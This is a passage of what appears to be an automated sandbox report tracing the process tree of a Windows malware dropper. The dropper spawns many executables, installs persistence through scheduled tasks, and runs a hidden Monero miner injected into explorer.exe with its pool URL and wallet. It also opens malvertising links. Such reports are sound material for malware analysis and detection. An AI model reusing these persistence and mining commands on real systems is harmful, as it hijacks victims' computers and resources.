C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6084 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 6048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5316 -s 17168⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-T3SE1.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-T3SE1.tmp\setup_2.tmp" /SL5="$10262,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1J1VM.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1J1VM.tmp\setup_2.tmp" /SL5="$20262,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 2606⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-P9PB6.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-P9PB6.tmp\Sun1966fb31dd5a07.tmp" /SL5="$30134,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-6AN6K.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-6AN6K.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Mail\FMDYOFITOC\ultramediaburner.exe"C:\Program Files\Windows Mail\FMDYOFITOC\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S517Q.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-S517Q.tmp\ultramediaburner.tmp" /SL5="$20274,281924,62464,C:\Program Files\Windows Mail\FMDYOFITOC\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8b-95f04-737-9f595-ebcc3e1f132e9\Leboberaeha.exe"C:\Users\Admin\AppData\Local\Temp\8b-95f04-737-9f595-ebcc3e1f132e9\Leboberaeha.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2792 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1288 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7032 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7008 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6560 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7768 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15559460601176086304,1900318503407260942,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xec,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
